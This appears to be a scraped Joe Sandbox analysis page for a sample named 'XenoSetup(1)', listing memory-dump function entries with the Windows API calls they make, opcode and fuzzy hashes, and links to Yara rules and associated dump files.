Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 019d7310ba67f80b70008bbf1b0ac0385120d73c8fca1b0deb53dde7e74173ab
Instruction ID: dbf09e360da7aee64db936f3434d9233a52b451638e561883b4c7e45bab9d2c4
Opcode Fuzzy Hash: 019d7310ba67f80b70008bbf1b0ac0385120d73c8fca1b0deb53dde7e74173ab
Instruction Fuzzy Hash: F5D0A934254A02187C6B2ABA380D9982286BC52BB0FA002DAE4E08D8C1EF959080A212

Function 00FE12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00FE1306
ShowWindow.USER32(00000000), ref: 00FE130D

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 1d4eade216c8077a11ea27064ca207ab2d91ec10708046bececaa6ec193f3e3f
Instruction ID: 94c3c5682e655515063a580644aab0c5074f931fc4fc3034227e24b02dbfbbaf
Opcode Fuzzy Hash: 1d4eade216c8077a11ea27064ca207ab2d91ec10708046bececaa6ec193f3e3f
Instruction Fuzzy Hash: DCC012BA05C260BFCB010BB4DD0AC2BBBB8BBA5312F04C908B0E5C0064C23EC010DB11

Function 00FE1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FE1A09

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 189bbcde6dea558fadf5b789cbed6133e514ed4ef31151068790a1801bb94f43
Instruction ID: 2460bae855fcf678aeade7f07433d4a550e95d8b64230fc58fe1161ab59d72fb
Opcode Fuzzy Hash: 189bbcde6dea558fadf5b789cbed6133e514ed4ef31151068790a1801bb94f43
Instruction Fuzzy Hash: 3DC1C230E002949FEF24DF2AC884BA97BA5BF55320F1801B9EC45DF286DB359944DB61

Function 00FE3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FE3BBF

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c5f0b5e07a0c90e9b61dd2aa503048ed031767c9078d19d2adda87cef531cbe6
Instruction ID: a846d539bc4fa7a742295db9fbb160994c058a997cd5a31daa4346f723f754fc
Opcode Fuzzy Hash: c5f0b5e07a0c90e9b61dd2aa503048ed031767c9078d19d2adda87cef531cbe6
Instruction Fuzzy Hash: A671C271500BC49EDB35DB75CC59AE7B7E9AF14300F40096EE2AB87241DA367A48EF11

Function 00FE8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FE8289

Part of subcall function 00FE13DC: __EH_prolog.LIBCMT ref: 00FE13E1

Part of subcall function 00FEA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00FEA598

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 6d62adbae2b7c82f814bb71cbac18aa8b3c495ebf7adbcd80df860f93cbe666f
Instruction ID: 6e18d069dc5bf452563eeea1e671ac2ffa59b2060296cf50e342d60d62215ca6
Opcode Fuzzy Hash: 6d62adbae2b7c82f814bb71cbac18aa8b3c495ebf7adbcd80df860f93cbe666f
Instruction Fuzzy Hash: C841C9719446989EDB20EBA2CC55AE9B7B8BF00344F4404EBE18E97093EB745E85EB50

Function 00FE13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FE13E1

Part of subcall function 00FE5E37: __EH_prolog.LIBCMT ref: 00FE5E3C

Part of subcall function 00FECE40: __EH_prolog.LIBCMT ref: 00FECE45

Part of subcall function 00FEB505: __EH_prolog.LIBCMT ref: 00FEB50A

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 432ab172bb61cbc234cb4c1c6892551fa18b19e1741b8a9dc72350c4bc62e8a4
Instruction ID: 7c02aaa22f3f5b0e37802c17c6b5f9894d2c39fe66cb1156ee2806952f9a0023
Opcode Fuzzy Hash: 432ab172bb61cbc234cb4c1c6892551fa18b19e1741b8a9dc72350c4bc62e8a4
Instruction Fuzzy Hash: 8A414DB0905B40DED724CF3A8885AE6FBE5BF19310F544A2EE5FE83291C7356654DB10

Function 00FE13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FE13E1

Part of subcall function 00FE5E37: __EH_prolog.LIBCMT ref: 00FE5E3C

Part of subcall function 00FECE40: __EH_prolog.LIBCMT ref: 00FECE45

Part of subcall function 00FEB505: __EH_prolog.LIBCMT ref: 00FEB50A

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9e6f4fd339b9a8014f34d747b54c1d3e7f37c7dd704fdc3cb66bb502a9fbc3fd
Instruction ID: e9ad3bf8b81f13c4a79b992ffed0a370b8ef91a8b0bcfdcf1415a815144bf107
Opcode Fuzzy Hash: 9e6f4fd339b9a8014f34d747b54c1d3e7f37c7dd704fdc3cb66bb502a9fbc3fd
Instruction Fuzzy Hash: 03416DB0905B809EE724CF3A8885AE7FBE5BF19310F504A2ED5FE83281C7352654DB10

Function 00FFB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FFB098

Part of subcall function 00FE13DC: __EH_prolog.LIBCMT ref: 00FE13E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 215309cea613fa9fd6e98f14837f378eeb947b820d8a96d798fdf26abffcbe31
Instruction ID: 75ec14512e6286f833fa4c615d1c66145ffa99256c95a302c8737ce244f02a4c
Opcode Fuzzy Hash: 215309cea613fa9fd6e98f14837f378eeb947b820d8a96d798fdf26abffcbe31
Instruction Fuzzy Hash: 3D316A75C002899EDB15DFA5CC50AFEBBB4AF09300F10449AE409B7292D739AE04DBA1

Function 0100AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,01013A34), ref: 0100ACF8

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 863914dd584b1901dbfdc4b531772a6c7e90ad76bdda4187c135f449f7261b22
Instruction ID: b0fe4ea911825610ddf136aede151477948de1f2e970406160a10da97384231b
Opcode Fuzzy Hash: 863914dd584b1901dbfdc4b531772a6c7e90ad76bdda4187c135f449f7261b22
Instruction Fuzzy Hash: 3611AB33700729EFBB37AD1CD85095E77D5AB84260F164161EDD5AB284D635DC0187D0

Function 00FE9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FE921A

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d8b7dfeef839d51de75a4ecb3dbed084eb0e2c4ccb0ef994103613d9f6eb9c3e
Instruction ID: aac972b548801f700f672c011f312cf1593bc59ee8db9ce1084ce206d841614b
Opcode Fuzzy Hash: d8b7dfeef839d51de75a4ecb3dbed084eb0e2c4ccb0ef994103613d9f6eb9c3e
Instruction Fuzzy Hash: 3E016933D005A8ABCF11AFA9CC419DEB736BF88750F014515F915B7161DA788D05E6B1

Function 0100C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 0100B136: RtlAllocateHeap.NTDLL(00000008,01013A34,00000000,?,0100989A,00000001,00000364,?,?,?,00FED984,?,?,?,00000004,00FED710), ref: 0100B177

_free.LIBCMT ref: 0100C4E5

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction ID: 279670247669cb11dab6d7bf08a3f41e260391ed4ecc68332f9b3986ce60cfba
Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction Fuzzy Hash: F901FE726003066BF3328F59D8859AAFBEDFB85270F26065DD5D4832C1EA30A905C774

Function 0100B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,01013A34,00000000,?,0100989A,00000001,00000364,?,?,?,00FED984,?,?,?,00000004,00FED710), ref: 0100B177

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2bfd7347c7beb9dec7a98dc95588042c50ef50fad8035a382773ab1ec5056aa8
Instruction ID: a5640b7fdec4b5760e2210a0d25b13fbb967810d3f778e43b925f8a4756cc418
Opcode Fuzzy Hash: 2bfd7347c7beb9dec7a98dc95588042c50ef50fad8035a382773ab1ec5056aa8
Instruction Fuzzy Hash: 86F0B43A605525A7FB735A25AC05BDF3B88AF81B70F488251EDD89A1C0CA24D50182E4

Function 01003C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 01003C3F

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: c6adea42bb4215fb96612b78a9d830ff560d46fae3d073fbe5dae13b10cef57e
Instruction ID: 89ad7d723f7cf51afe55aa938628c9369d909ddf3bf77ff4c77284ba10e5e9cc
Opcode Fuzzy Hash: c6adea42bb4215fb96612b78a9d830ff560d46fae3d073fbe5dae13b10cef57e
Instruction Fuzzy Hash: DBF0823620461A9FAF138E6EEC10E9A77D9BF41A61B144524FA85CA1C0DB31E460C790

Function 01008E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0100CA2C,00000000,?,01006CBE,?,00000008,?,010091E0,?,?,?), ref: 01008E38

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f93d3adbdc7c16764c92bcf6154c1f63147aa41af4d40ed201bd140dd16f5130
Instruction ID: 80ec4fe05348ce409efbdd0471940eb99452ff67393903e7d10fb022e6fe53f7
Opcode Fuzzy Hash: f93d3adbdc7c16764c92bcf6154c1f63147aa41af4d40ed201bd140dd16f5130
Instruction Fuzzy Hash: 4BE06531A0259557FAB326699C04BDF7A9CBB517B4F058153ADD8960C1CB25DD0082E5

Function 00FE5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FE5AC2

Part of subcall function 00FEB505: __EH_prolog.LIBCMT ref: 00FEB50A

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e4ca4fe34a5239bd4fd8755a9a0acafea94c263f446a9e39cd58fd70aa4185a3
Instruction ID: 25bcea9a512439b23b30ae062271276631acc8660ecaf05f16cba858d45d62e4
Opcode Fuzzy Hash: e4ca4fe34a5239bd4fd8755a9a0acafea94c263f446a9e39cd58fd70aa4185a3
Instruction Fuzzy Hash: FF018C308107D8DAD725E7B8C8517EDFBA4AF64304F54848DA556A3393CFB81B08E7A2

Function 00FEA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00FEA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00FEA592,000000FF,?,?), ref: 00FEA6C4
Part of subcall function 00FEA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00FEA592,000000FF,?,?), ref: 00FEA6F2
Part of subcall function 00FEA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00FEA592,000000FF,?,?), ref: 00FEA6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00FEA598

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 5ce85582fe7c160d33c491781d2300e08a9ac25051bfddb4c65eac228fdefa3b
Instruction ID: 5ae1a252fe8da930485eebcf4c9d5b9fae36377d58ab301372bc6cf8e267faeb
Opcode Fuzzy Hash: 5ce85582fe7c160d33c491781d2300e08a9ac25051bfddb4c65eac228fdefa3b
Instruction Fuzzy Hash: BAF082324087D0AACB225BB58D05BCB7BD06F1A331F188A49F1FD62196C2796094AB23

Function 00FF0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00FF0E3D

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: d463d6f87276cbc1aa834463334664f4fd726cf5871db1f43550e39331ef417f
Instruction ID: 1bfbfe6909c371267e35eacb34daf4ae2dbc4ed268a9e2a538a056cc1a7523ad
Opcode Fuzzy Hash: d463d6f87276cbc1aa834463334664f4fd726cf5871db1f43550e39331ef417f
Instruction Fuzzy Hash: C3D0C220B0109CD6DA2133296859BFE3A069FD6721F0C0065F3899B197CE9D0842B361

Function 00FFA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00FFA62C

Part of subcall function 00FFA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00FFA3DA

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: 01b210e5ade2ac8808bfe1fc3ff9bfb2b4b230c78973707ee780a88d356442e5
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: 83D0C7B561020DB6DF416B618C1297E7995EF40350F048125BF45D5171EAB5D910B552

Function 00FFE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 00FFE5E3

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
